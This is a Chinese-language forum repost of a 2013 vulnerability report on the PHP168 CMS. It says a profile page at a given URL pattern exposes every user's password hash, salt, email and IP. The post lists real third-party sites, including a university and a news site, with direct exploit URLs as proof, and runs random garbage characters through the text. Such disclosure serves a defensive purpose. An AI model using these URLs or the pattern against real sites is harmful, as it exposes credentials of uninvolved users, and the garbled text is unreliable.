|
简要描述: 国微PHP168中出现了一处神奇的array,可致全站用户数据泄露。泄露的内容包括全站用户的密码密文、邮箱、密码salt、IP等敏感信息。 详细说明:PHP168程序内置“用户”模块包含用户个人资料展示页面。在很多实际场景中,这个页面不会在前台使用,但可直接通过URL进行访问。页面路由为:/homepage.php/[用户名]/member-profile
& B" G3 Z0 {7 g5 g4 S) k8 J& l8 q/ u, ~/ O
以PHP168官方演示站点为例,查看任意用户信息的页面链接为:
$ X9 ]3 b" Y' P M s# F( |& h: F2 d/ ^
http://php168.cn/com/homepage.php/admin/member-profile9 J1 [" N! i( L
' q3 [. o x* x由于该模块代码中出现了一句神奇的array,导致用户数据表内所有数据被当作数组取出直接显示出来。
( [3 Q9 j. C( \: Hhttp://www.myhack58.com/Article/UploadPic/2013-9/2013920918425520.jpg$ _5 M, f: [5 e( Z4 g, `
% P7 I3 E4 u- B! T4 } 漏洞证明:该漏洞影响使用该CMS系统的站点,以PHP168官网上的客户案例为例:8 M4 h q! N$ g$ h8 |
4 Z# x0 ]4 G2 H/ V d& B
http://www.zjfzol.com.cn/homepage.php/admin/member-profile
6 t% [1 P6 ]( J; ~# F# R
% x3 _8 Q. x* l4 y- K+ qhttp://www.scswl.cn/homepage.php/admin/member-profile$ ?. I- x* Y0 w
: \ E8 E4 h: f% g9 ^9 H4 [http://www.tunet.edu.cn/homepage.php/admin/member-profile+ }6 }6 c2 A, B. m
& `& a1 j( ]" S/ h+ }5 O: A6 y9 Zhttp://www.itlead.com.cn/homepage.php/admin/member-profile8 T9 `; [, O3 W/ ?
/ A8 j+ d1 q( E8 C* V5 J4 N1 v
http://www.aedp.cn/homepage.php/admin/member-profile; G: r" X' J0 c' o0 i" o$ @
- ?- @# y* G; x6 g7 t. J6 f# Bhttp://www.qianlongnews.com/homepage.php/test/member-profile
( ~. |- W+ n& @( a) y- s! l) ~: @% I8 y0 @
http://ny.zlxk.com/gov/homepage.php/admin/member-profile 修复方案:去掉输出 [/td][/tr]
& }0 P# H$ s- g& j- i[/table] | 
发表于 2013-9-21 16:02:53
收藏
支持
反对